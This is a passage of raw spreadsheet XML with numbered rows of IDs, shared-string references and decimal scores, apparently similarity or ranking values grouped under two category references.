        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="25265" ht="15.75" customHeight="1">
      <c r="A25265" s="1">
        <v>14297.0</v>
      </c>
      <c r="B25265" s="2">
        <v>3.8572072E7</v>
      </c>
      <c r="C25265" s="2" t="s">
        <v>24307</v>
      </c>
      <c r="D25265" s="2">
        <v>1.0</v>
      </c>
      <c r="E25265" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25265" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="25266" ht="15.75" customHeight="1">
      <c r="A25266" s="1">
        <v>2033.0</v>
      </c>
      <c r="B25266" s="2">
        <v>3.0859633E7</v>
      </c>
      <c r="C25266" s="2" t="s">
        <v>24308</v>
      </c>
      <c r="D25266" s="2">
        <v>1.0</v>
      </c>
      <c r="E25266" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25266" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25267" ht="15.75" customHeight="1">
      <c r="A25267" s="1">
        <v>3564.0</v>
      </c>
      <c r="B25267" s="2">
        <v>3.8875236E7</v>
      </c>
      <c r="C25267" s="2" t="s">
        <v>24236</v>
      </c>
      <c r="D25267" s="2">
        <v>1.0</v>
      </c>
      <c r="E25267" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25267" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25268" ht="15.75" customHeight="1">
      <c r="A25268" s="1">
        <v>14475.0</v>
      </c>
      <c r="B25268" s="2">
        <v>3.9522216E7</v>
      </c>
      <c r="C25268" s="2" t="s">
        <v>24309</v>
      </c>
      <c r="D25268" s="2">
        <v>1.0</v>
      </c>
      <c r="E25268" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25268" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25269" ht="15.75" customHeight="1">
      <c r="A25269" s="1">
        <v>18346.0</v>
      </c>
      <c r="B25269" s="2">
        <v>5.2477419E7</v>
      </c>
      <c r="C25269" s="2" t="s">
        <v>24310</v>
      </c>
      <c r="D25269" s="2">
        <v>1.0</v>
      </c>
      <c r="E25269" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25269" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25270" ht="15.75" customHeight="1">
      <c r="A25270" s="1">
        <v>18622.0</v>
      </c>
      <c r="B25270" s="2">
        <v>5.3354652E7</v>
      </c>
      <c r="C25270" s="2" t="s">
        <v>24311</v>
      </c>
      <c r="D25270" s="2">
        <v>1.0</v>
      </c>
      <c r="E25270" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25270" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25271" ht="15.75" customHeight="1">
      <c r="A25271" s="1">
        <v>23836.0</v>
      </c>
      <c r="B25271" s="2">
        <v>8095505.0</v>
      </c>
      <c r="C25271" s="2" t="s">
        <v>24312</v>
      </c>
      <c r="D25271" s="2">
        <v>1.0</v>
      </c>
      <c r="E25271" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25271" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25272" ht="15.75" customHeight="1">
      <c r="A25272" s="1">
        <v>25280.0</v>
      </c>
      <c r="B25272" s="2">
        <v>1.3396556E7</v>
      </c>
      <c r="C25272" s="2" t="s">
        <v>24313</v>
      </c>
      <c r="D25272" s="2">
        <v>1.0</v>
      </c>
      <c r="E25272" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25272" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25273" ht="15.75" customHeight="1">
      <c r="A25273" s="1">
        <v>28303.0</v>
      </c>
      <c r="B25273" s="2">
        <v>2.5635573E7</v>
      </c>
      <c r="C25273" s="2" t="s">
        <v>24314</v>
      </c>
      <c r="D25273" s="2">
        <v>1.0</v>
      </c>
      <c r="E25273" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25273" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="25274" ht="15.75" customHeight="1">
      <c r="A25274" s="1">
        <v>32813.0</v>
      </c>
      <c r="B25274" s="2">
        <v>6185503.0</v>
      </c>
      <c r="C25274" s="2" t="s">
        <v>24315</v>
      </c>
      <c r="D25274" s="2">
        <v>1.0</v>
      </c>
      <c r="E25274" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25274" s="2">
        <v>0.09259259259259256</v>
      </c>
    </row>
    <row r="25275" ht="15.75" customHeight="1">
      <c r="A25275" s="1">
        <v>34002.0</v>
      </c>
      <c r="B25275" s="2">
        <v>9457952.0</v>
      </c>
      <c r="C25275" s="2" t="s">
        <v>24316</v>
      </c>
      <c r="D25275" s="2">
        <v>1.0</v>
      </c>
      <c r="E25275" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25275" s="2">
        <v>0.09226190476190474</v>
      </c>
    </row>
    <row r="25276" ht="15.75" customHeight="1">
      <c r="A25276" s="1">
        <v>6760.0</v>
      </c>
      <c r="B25276" s="2">
        <v>4.9409304E7</v>
      </c>
      <c r="C25276" s="2" t="s">
        <v>24317</v>
      </c>
      <c r="D25276" s="2">
        <v>1.0</v>
      </c>
      <c r="E25276" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25276" s="2">
        <v>0.304783950617284</v>
      </c>
    </row>
    <row r="25277" ht="15.75" customHeight="1">
      <c r="A25277" s="1">
        <v>20112.0</v>
      </c>
      <c r="B25277" s="2">
        <v>4624273.0</v>
      </c>
      <c r="C25277" s="2" t="s">
        <v>24319</v>
      </c>
      <c r="D25277" s="2">
        <v>1.0</v>
      </c>
      <c r="E25277" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25277" s="2">
        <v>0.2609001406469761</v>
      </c>
    </row>
    <row r="25278" ht="15.75" customHeight="1">
      <c r="A25278" s="1">
        <v>27560.0</v>
      </c>
      <c r="B25278" s="2">
        <v>2.242347E7</v>
      </c>
      <c r="C25278" s="2" t="s">
        <v>24320</v>
      </c>
      <c r="D25278" s="2">
        <v>1.0</v>
      </c>
      <c r="E25278" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25278" s="2">
        <v>0.2314814814814815</v>
      </c>
    </row>
    <row r="25279" ht="15.75" customHeight="1">
      <c r="A25279" s="1">
        <v>16154.0</v>
      </c>
      <c r="B25279" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C25279" s="2" t="s">
        <v>24321</v>
      </c>
      <c r="D25279" s="2">
        <v>1.0</v>
      </c>
      <c r="E25279" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25279" s="2">
        <v>0.2304189435336977</v>
      </c>
    </row>
    <row r="25280" ht="15.75" customHeight="1">
      <c r="A25280" s="1">
        <v>5942.0</v>
      </c>
      <c r="B25280" s="2">
        <v>4.7277072E7</v>
      </c>
      <c r="C25280" s="2" t="s">
        <v>24322</v>
      </c>
      <c r="D25280" s="2">
        <v>1.0</v>
      </c>
      <c r="E25280" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25280" s="2">
        <v>0.22991452991453</v>
      </c>
    </row>
    <row r="25281" ht="15.75" customHeight="1">
      <c r="A25281" s="1">
        <v>21446.0</v>
      </c>
      <c r="B25281" s="2">
        <v>2.2423471E7</v>
      </c>
      <c r="C25281" s="2" t="s">
        <v>24320</v>
      </c>
      <c r="D25281" s="2">
        <v>1.0</v>
      </c>
      <c r="E25281" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25281" s="2">
        <v>0.2297979797979798</v>
      </c>
    </row>
    <row r="25282" ht="15.75" customHeight="1">
      <c r="A25282" s="1">
        <v>8839.0</v>
      </c>
      <c r="B25282" s="2">
        <v>5.4676811E7</v>
      </c>
      <c r="C25282" s="2" t="s">
        <v>24323</v>
      </c>
      <c r="D25282" s="2">
        <v>1.0</v>
      </c>
      <c r="E25282" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25282" s="2">
        <v>0.2250566893424036</v>
      </c>
    </row>
    <row r="25283" ht="15.75" customHeight="1">
      <c r="A25283" s="1">
        <v>2893.0</v>
      </c>
      <c r="B25283" s="2">
        <v>3.5727611E7</v>
      </c>
      <c r="C25283" s="2" t="s">
        <v>24324</v>
      </c>
      <c r="D25283" s="2">
        <v>1.0</v>
      </c>
      <c r="E25283" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25283" s="2">
        <v>0.2229938271604938</v>
      </c>
    </row>
    <row r="25284" ht="15.75" customHeight="1">
      <c r="A25284" s="1">
        <v>33423.0</v>
      </c>
      <c r="B25284" s="2">
        <v>7768980.0</v>
      </c>
      <c r="C25284" s="2" t="s">
        <v>24325</v>
      </c>
      <c r="D25284" s="2">
        <v>1.0</v>
      </c>
      <c r="E25284" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25284" s="2">
        <v>0.2196180555555556</v>
      </c>
    </row>
    <row r="25285" ht="15.75" customHeight="1">
      <c r="A25285" s="1">
        <v>32069.0</v>
      </c>
      <c r="B25285" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C25285" s="2" t="s">
        <v>24326</v>
      </c>
      <c r="D25285" s="2">
        <v>1.0</v>
      </c>
      <c r="E25285" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25285" s="2">
        <v>0.2183098591549296</v>
      </c>
    </row>
    <row r="25286" ht="15.75" customHeight="1">
      <c r="A25286" s="1">
        <v>32537.0</v>
      </c>
      <c r="B25286" s="2">
        <v>5739951.0</v>
      </c>
      <c r="C25286" s="2" t="s">
        <v>24327</v>
      </c>
      <c r="D25286" s="2">
        <v>1.0</v>
      </c>
      <c r="E25286" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25286" s="2">
        <v>0.2158469945355191</v>
      </c>
    </row>
    <row r="25287" ht="15.75" customHeight="1">
      <c r="A25287" s="1">
        <v>29338.0</v>
      </c>
      <c r="B25287" s="2">
        <v>3.1334088E7</v>
      </c>
      <c r="C25287" s="2" t="s">
        <v>24328</v>
      </c>
      <c r="D25287" s="2">
        <v>1.0</v>
      </c>
      <c r="E25287" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25287" s="2">
        <v>0.2145390070921986</v>
      </c>
    </row>
    <row r="25288" ht="15.75" customHeight="1">
      <c r="A25288" s="1">
        <v>18062.0</v>
      </c>
      <c r="B25288" s="2">
        <v>5.1602586E7</v>
      </c>
      <c r="C25288" s="2" t="s">
        <v>24329</v>
      </c>
      <c r="D25288" s="2">
        <v>1.0</v>
      </c>
      <c r="E25288" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25288" s="2">
        <v>0.2129629629629629</v>
      </c>
    </row>
    <row r="25289" ht="15.75" customHeight="1">
      <c r="A25289" s="1">
        <v>21587.0</v>
      </c>
      <c r="B25289" s="2">
        <v>2.3928197E7</v>
      </c>
      <c r="C25289" s="2" t="s">
        <v>24330</v>
      </c>
      <c r="D25289" s="2">
        <v>1.0</v>
      </c>
      <c r="E25289" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25289" s="2">
        <v>0.2123655913978495</v>
      </c>
    </row>
    <row r="25290" ht="15.75" customHeight="1">
      <c r="A25290" s="1">
        <v>30336.0</v>
      </c>
      <c r="B25290" s="2">
        <v>3.8138261E7</v>
      </c>
      <c r="C25290" s="2" t="s">
        <v>24331</v>
      </c>
      <c r="D25290" s="2">
        <v>1.0</v>
      </c>
      <c r="E25290" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25290" s="2">
        <v>0.2106481481481482</v>
      </c>
    </row>
    <row r="25291" ht="15.75" customHeight="1">
      <c r="A25291" s="1">
        <v>14954.0</v>
      </c>
      <c r="B25291" s="2">
        <v>4.1318615E7</v>
      </c>
      <c r="C25291" s="2" t="s">
        <v>24332</v>
      </c>
      <c r="D25291" s="2">
        <v>1.0</v>
      </c>
      <c r="E25291" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25291" s="2">
        <v>0.2101139601139601</v>
      </c>
    </row>
    <row r="25292" ht="15.75" customHeight="1">
      <c r="A25292" s="1">
        <v>26113.0</v>
      </c>
      <c r="B25292" s="2">
        <v>1.5843298E7</v>
      </c>
      <c r="C25292" s="2" t="s">
        <v>24333</v>
      </c>
      <c r="D25292" s="2">
        <v>1.0</v>
      </c>
      <c r="E25292" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25292" s="2">
        <v>0.2083333333333333</v>
      </c>
    </row>
    <row r="25293" ht="15.75" customHeight="1">
      <c r="A25293" s="1">
        <v>29361.0</v>
      </c>
      <c r="B25293" s="2">
        <v>3.1649715E7</v>
      </c>
      <c r="C25293" s="2" t="s">
        <v>24334</v>
      </c>
      <c r="D25293" s="2">
        <v>1.0</v>
      </c>
      <c r="E25293" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25293" s="2">
        <v>0.2071428571428572</v>
      </c>
    </row>
    <row r="25294" ht="15.75" customHeight="1">
      <c r="A25294" s="1">
        <v>21447.0</v>
      </c>
      <c r="B25294" s="2">
        <v>2.2423471E7</v>
      </c>
      <c r="C25294" s="2" t="s">
        <v>24335</v>
      </c>
      <c r="D25294" s="2">
        <v>1.0</v>
      </c>
      <c r="E25294" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25294" s="2">
        <v>0.2062146892655367</v>
      </c>
    </row>
    <row r="25295" ht="15.75" customHeight="1">
      <c r="A25295" s="1">
        <v>27561.0</v>
      </c>
      <c r="B25295" s="2">
        <v>2.242347E7</v>
      </c>
      <c r="C25295" s="2" t="s">
        <v>24335</v>
      </c>
      <c r="D25295" s="2">
        <v>1.0</v>
      </c>
      <c r="E25295" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25295" s="2">
        <v>0.2062146892655367</v>
      </c>
    </row>
    <row r="25296" ht="15.75" customHeight="1">
      <c r="A25296" s="1">
        <v>33306.0</v>
      </c>
      <c r="B25296" s="2">
        <v>7507250.0</v>
      </c>
      <c r="C25296" s="2" t="s">
        <v>24336</v>
      </c>
      <c r="D25296" s="2">
        <v>1.0</v>
      </c>
      <c r="E25296" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25296" s="2">
        <v>0.2062146892655367</v>
      </c>
    </row>
    <row r="25297" ht="15.75" customHeight="1">
      <c r="A25297" s="1">
        <v>33424.0</v>
      </c>
      <c r="B25297" s="2">
        <v>7768980.0</v>
      </c>
      <c r="C25297" s="2" t="s">
        <v>24335</v>
      </c>
      <c r="D25297" s="2">
        <v>1.0</v>
      </c>
      <c r="E25297" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25297" s="2">
        <v>0.2062146892655367</v>
      </c>
    </row>
    <row r="25298" ht="15.75" customHeight="1">
      <c r="A25298" s="1">
        <v>33698.0</v>
      </c>
      <c r="B25298" s="2">
        <v>8465360.0</v>
      </c>
      <c r="C25298" s="2" t="s">
        <v>24335</v>
      </c>
      <c r="D25298" s="2">
        <v>1.0</v>
      </c>
      <c r="E25298" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25298" s="2">
        <v>0.2062146892655367</v>
      </c>
    </row>
    <row r="25299" ht="15.75" customHeight="1">
      <c r="A25299" s="1">
        <v>31030.0</v>
      </c>
      <c r="B25299" s="2">
        <v>4.7806596E7</v>
      </c>
      <c r="C25299" s="4" t="s">
        <v>24337</v>
      </c>
      <c r="D25299" s="2">
        <v>1.0</v>
      </c>
      <c r="E25299" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25299" s="2">
        <v>0.2045454545454545</v>
      </c>
    </row>
    <row r="25300" ht="15.75" customHeight="1">
      <c r="A25300" s="1">
        <v>22204.0</v>
      </c>
      <c r="B25300" s="2">
        <v>3.2035318E7</v>
      </c>
      <c r="C25300" s="2" t="s">
        <v>24338</v>
      </c>
      <c r="D25300" s="2">
        <v>1.0</v>
      </c>
      <c r="E25300" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25300" s="2">
        <v>0.2019400352733687</v>
      </c>
    </row>
    <row r="25301" ht="15.75" customHeight="1">
      <c r="A25301" s="1">
        <v>6352.0</v>
      </c>
      <c r="B25301" s="2">
        <v>4.8318012E7</v>
      </c>
      <c r="C25301" s="2" t="s">
        <v>24339</v>
      </c>
      <c r="D25301" s="2">
        <v>1.0</v>
      </c>
      <c r="E25301" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25301" s="2">
        <v>0.2001763668430336</v>
      </c>
    </row>
    <row r="25302" ht="15.75" customHeight="1">
      <c r="A25302" s="1">
        <v>5944.0</v>
      </c>
      <c r="B25302" s="2">
        <v>4.7277072E7</v>
      </c>
      <c r="C25302" s="2" t="s">
        <v>24340</v>
      </c>
      <c r="D25302" s="2">
        <v>1.0</v>
      </c>
      <c r="E25302" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25302" s="2">
        <v>0.1994535519125684</v>
      </c>
    </row>
    <row r="25303" ht="15.75" customHeight="1">
      <c r="A25303" s="1">
        <v>23797.0</v>
      </c>
      <c r="B25303" s="2">
        <v>7768981.0</v>
      </c>
      <c r="C25303" s="2" t="s">
        <v>24341</v>
      </c>
      <c r="D25303" s="2">
        <v>1.0</v>
      </c>
      <c r="E25303" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25303" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="25304" ht="15.75" customHeight="1">
      <c r="A25304" s="1">
        <v>31227.0</v>
      </c>
      <c r="B25304" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25304" s="2" t="s">
        <v>24342</v>
      </c>
      <c r="D25304" s="2">
        <v>1.0</v>
      </c>
      <c r="E25304" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25304" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="25305" ht="15.75" customHeight="1">
      <c r="A25305" s="1">
        <v>29976.0</v>
      </c>
      <c r="B25305" s="2">
        <v>3609793.0</v>
      </c>
      <c r="C25305" s="2" t="s">
        <v>24343</v>
      </c>
      <c r="D25305" s="2">
        <v>1.0</v>
      </c>
      <c r="E25305" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25305" s="2">
        <v>0.1935185185185185</v>
      </c>
    </row>
    <row r="25306" ht="15.75" customHeight="1">
      <c r="A25306" s="1">
        <v>33155.0</v>
      </c>
      <c r="B25306" s="2">
        <v>7073032.0</v>
      </c>
      <c r="C25306" s="2" t="s">
        <v>24344</v>
      </c>
      <c r="D25306" s="2">
        <v>1.0</v>
      </c>
      <c r="E25306" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25306" s="2">
        <v>0.1931216931216932</v>
      </c>
    </row>
    <row r="25307" ht="15.75" customHeight="1">
      <c r="A25307" s="1">
        <v>32048.0</v>
      </c>
      <c r="B25307" s="2">
        <v>5370131.0</v>
      </c>
      <c r="C25307" s="2" t="s">
        <v>24345</v>
      </c>
      <c r="D25307" s="2">
        <v>1.0</v>
      </c>
      <c r="E25307" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25307" s="2">
        <v>0.1930320150659134</v>
      </c>
    </row>
    <row r="25308" ht="15.75" customHeight="1">
      <c r="A25308" s="1">
        <v>29770.0</v>
      </c>
      <c r="B25308" s="2">
        <v>3.4920261E7</v>
      </c>
      <c r="C25308" s="2" t="s">
        <v>24346</v>
      </c>
      <c r="D25308" s="2">
        <v>1.0</v>
      </c>
      <c r="E25308" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25308" s="2">
        <v>0.1891701828410689</v>
      </c>
    </row>
    <row r="25309" ht="15.75" customHeight="1">
      <c r="A25309" s="1">
        <v>608.0</v>
      </c>
      <c r="B25309" s="2">
        <v>1.9401425E7</v>
      </c>
      <c r="C25309" s="2" t="s">
        <v>24347</v>
      </c>
      <c r="D25309" s="2">
        <v>1.0</v>
      </c>
      <c r="E25309" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25309" s="2">
        <v>0.187962962962963</v>
      </c>
    </row>
    <row r="25310" ht="15.75" customHeight="1">
      <c r="A25310" s="1">
        <v>27799.0</v>
      </c>
      <c r="B25310" s="2">
        <v>2.3180975E7</v>
      </c>
      <c r="C25310" s="2" t="s">
        <v>24348</v>
      </c>
      <c r="D25310" s="2">
        <v>1.0</v>
      </c>
      <c r="E25310" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25310" s="2">
        <v>0.1842684268426843</v>
      </c>
    </row>
    <row r="25311" ht="15.75" customHeight="1">
      <c r="A25311" s="1">
        <v>11106.0</v>
      </c>
      <c r="B25311" s="2">
        <v>1.8652804E7</v>
      </c>
      <c r="C25311" s="2" t="s">
        <v>24349</v>
      </c>
      <c r="D25311" s="2">
        <v>1.0</v>
      </c>
      <c r="E25311" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25311" s="2">
        <v>0.1810897435897436</v>
      </c>
    </row>
    <row r="25312" ht="15.75" customHeight="1">
      <c r="A25312" s="1">
        <v>22556.0</v>
      </c>
      <c r="B25312" s="2">
        <v>3.8299856E7</v>
      </c>
      <c r="C25312" s="2" t="s">
        <v>24350</v>
      </c>
      <c r="D25312" s="2">
        <v>1.0</v>
      </c>
      <c r="E25312" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25312" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="25313" ht="15.75" customHeight="1">
      <c r="A25313" s="1">
        <v>30496.0</v>
      </c>
      <c r="B25313" s="2">
        <v>3996596.0</v>
      </c>
      <c r="C25313" s="2" t="s">
        <v>24351</v>
      </c>
      <c r="D25313" s="2">
        <v>1.0</v>
      </c>
      <c r="E25313" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25313" s="2">
        <v>0.1801994301994302</v>
      </c>
    </row>
    <row r="25314" ht="15.75" customHeight="1">
      <c r="A25314" s="1">
        <v>30044.0</v>
      </c>
      <c r="B25314" s="2">
        <v>3621561.0</v>
      </c>
      <c r="C25314" s="2" t="s">
        <v>24352</v>
      </c>
      <c r="D25314" s="2">
        <v>1.0</v>
      </c>
      <c r="E25314" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25314" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="25315" ht="15.75" customHeight="1">
      <c r="A25315" s="1">
        <v>32633.0</v>
      </c>
      <c r="B25315" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C25315" s="2" t="s">
        <v>24353</v>
      </c>
      <c r="D25315" s="2">
        <v>1.0</v>
      </c>
      <c r="E25315" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25315" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="25316" ht="15.75" customHeight="1">
      <c r="A25316" s="1">
        <v>20280.0</v>
      </c>
      <c r="B25316" s="2">
        <v>1.116449E7</v>
      </c>
      <c r="C25316" s="2" t="s">
        <v>24354</v>
      </c>
      <c r="D25316" s="2">
        <v>1.0</v>
      </c>
      <c r="E25316" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25316" s="2">
        <v>0.1794171220400729</v>
      </c>
    </row>
    <row r="25317" ht="15.75" customHeight="1">
      <c r="A25317" s="1">
        <v>31539.0</v>
      </c>
      <c r="B25317" s="2">
        <v>5095178.0</v>
      </c>
      <c r="C25317" s="2" t="s">
        <v>24355</v>
      </c>
      <c r="D25317" s="2">
        <v>1.0</v>
      </c>
      <c r="E25317" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25317" s="2">
        <v>0.1794171220400729</v>
      </c>
    </row>
    <row r="25318" ht="15.75" customHeight="1">
      <c r="A25318" s="1">
        <v>30360.0</v>
      </c>
      <c r="B25318" s="2">
        <v>3.8299855E7</v>
      </c>
      <c r="C25318" s="2" t="s">
        <v>24350</v>
      </c>
      <c r="D25318" s="2">
        <v>1.0</v>
      </c>
      <c r="E25318" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25318" s="2">
        <v>0.1789215686274511</v>
      </c>
    </row>
    <row r="25319" ht="15.75" customHeight="1">
      <c r="A25319" s="1">
        <v>22452.0</v>
      </c>
      <c r="B25319" s="2">
        <v>3625179.0</v>
      </c>
      <c r="C25319" s="2" t="s">
        <v>24356</v>
      </c>
      <c r="D25319" s="2">
        <v>1.0</v>
      </c>
      <c r="E25319" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25319" s="2">
        <v>0.1782752902155888</v>
      </c>
    </row>
    <row r="25320" ht="15.75" customHeight="1">
      <c r="A25320" s="1">
        <v>30067.0</v>
      </c>
      <c r="B25320" s="2">
        <v>3625178.0</v>
      </c>
      <c r="C25320" s="2" t="s">
        <v>24356</v>
      </c>
      <c r="D25320" s="2">
        <v>1.0</v>
      </c>
      <c r="E25320" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25320" s="2">
        <v>0.1782752902155888</v>
      </c>
    </row>
    <row r="25321" ht="15.75" customHeight="1">
      <c r="A25321" s="1">
        <v>20591.0</v>
      </c>
      <c r="B25321" s="2">
        <v>1.3797437E7</v>
      </c>
      <c r="C25321" s="2" t="s">
        <v>24357</v>
      </c>
      <c r="D25321" s="2">
        <v>1.0</v>
      </c>
      <c r="E25321" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25321" s="2">
        <v>0.1782752902155887</v>
      </c>
    </row>
    <row r="25322" ht="15.75" customHeight="1">
      <c r="A25322" s="1">
        <v>2341.0</v>
      </c>
      <c r="B25322" s="2">
        <v>3.3035946E7</v>
      </c>
      <c r="C25322" s="2" t="s">
        <v>24358</v>
      </c>
      <c r="D25322" s="2">
        <v>1.0</v>
      </c>
      <c r="E25322" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25322" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="25323" ht="15.75" customHeight="1">
      <c r="A25323" s="1">
        <v>21823.0</v>
      </c>
      <c r="B25323" s="2">
        <v>2.6946777E7</v>
      </c>
      <c r="C25323" s="2" t="s">
        <v>24359</v>
      </c>
      <c r="D25323" s="2">
        <v>1.0</v>
      </c>
      <c r="E25323" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25323" s="2">
        <v>0.1768518518518519</v>
      </c>
    </row>
    <row r="25324" ht="15.75" customHeight="1">
      <c r="A25324" s="1">
        <v>8244.0</v>
      </c>
      <c r="B25324" s="2">
        <v>5.3365329E7</v>
      </c>
      <c r="C25324" s="2" t="s">
        <v>24360</v>
      </c>
      <c r="D25324" s="2">
        <v>1.0</v>
      </c>
      <c r="E25324" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25324" s="2">
        <v>0.1765232974910395</v>
      </c>
    </row>
    <row r="25325" ht="15.75" customHeight="1">
      <c r="A25325" s="1">
        <v>27477.0</v>
      </c>
      <c r="B25325" s="2">
        <v>2.1989826E7</v>
      </c>
      <c r="C25325" s="2" t="s">
        <v>24361</v>
      </c>
      <c r="D25325" s="2">
        <v>1.0</v>
      </c>
      <c r="E25325" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25325" s="2">
        <v>0.1764132553606239</v>
      </c>
    </row>
    <row r="25326" ht="15.75" customHeight="1">
      <c r="A25326" s="1">
        <v>25417.0</v>
      </c>
      <c r="B25326" s="2">
        <v>1.3797436E7</v>
      </c>
      <c r="C25326" s="2" t="s">
        <v>24357</v>
      </c>
      <c r="D25326" s="2">
        <v>1.0</v>
      </c>
      <c r="E25326" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25326" s="2">
        <v>0.1749585406301824</v>
      </c>
    </row>
    <row r="25327" ht="15.75" customHeight="1">
      <c r="A25327" s="1">
        <v>25631.0</v>
      </c>
      <c r="B25327" s="2">
        <v>1.4460434E7</v>
      </c>
      <c r="C25327" s="2" t="s">
        <v>24362</v>
      </c>
      <c r="D25327" s="2">
        <v>1.0</v>
      </c>
      <c r="E25327" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25327" s="2">
        <v>0.1742424242424243</v>
      </c>
    </row>
    <row r="25328" ht="15.75" customHeight="1">
      <c r="A25328" s="1">
        <v>27516.0</v>
      </c>
      <c r="B25328" s="2">
        <v>2.2167259E7</v>
      </c>
      <c r="C25328" s="2" t="s">
        <v>24363</v>
      </c>
      <c r="D25328" s="2">
        <v>1.0</v>
      </c>
      <c r="E25328" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25328" s="2">
        <v>0.1738095238095239</v>
      </c>
    </row>
    <row r="25329" ht="15.75" customHeight="1">
      <c r="A25329" s="1">
        <v>24936.0</v>
      </c>
      <c r="B25329" s="2">
        <v>1.2478997E7</v>
      </c>
      <c r="C25329" s="2" t="s">
        <v>24364</v>
      </c>
      <c r="D25329" s="2">
        <v>1.0</v>
      </c>
      <c r="E25329" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25329" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="25330" ht="15.75" customHeight="1">
      <c r="A25330" s="1">
        <v>27566.0</v>
      </c>
      <c r="B25330" s="2">
        <v>2.242347E7</v>
      </c>
      <c r="C25330" s="2" t="s">
        <v>24365</v>
      </c>
      <c r="D25330" s="2">
        <v>1.0</v>
      </c>
      <c r="E25330" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25330" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="25331" ht="15.75" customHeight="1">
      <c r="A25331" s="1">
        <v>28355.0</v>
      </c>
      <c r="B25331" s="2">
        <v>2.595724E7</v>
      </c>
      <c r="C25331" s="2" t="s">
        <v>24366</v>
      </c>
      <c r="D25331" s="2">
        <v>1.0</v>
      </c>
      <c r="E25331" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25331" s="2">
        <v>0.1733601070950469</v>
      </c>
    </row>
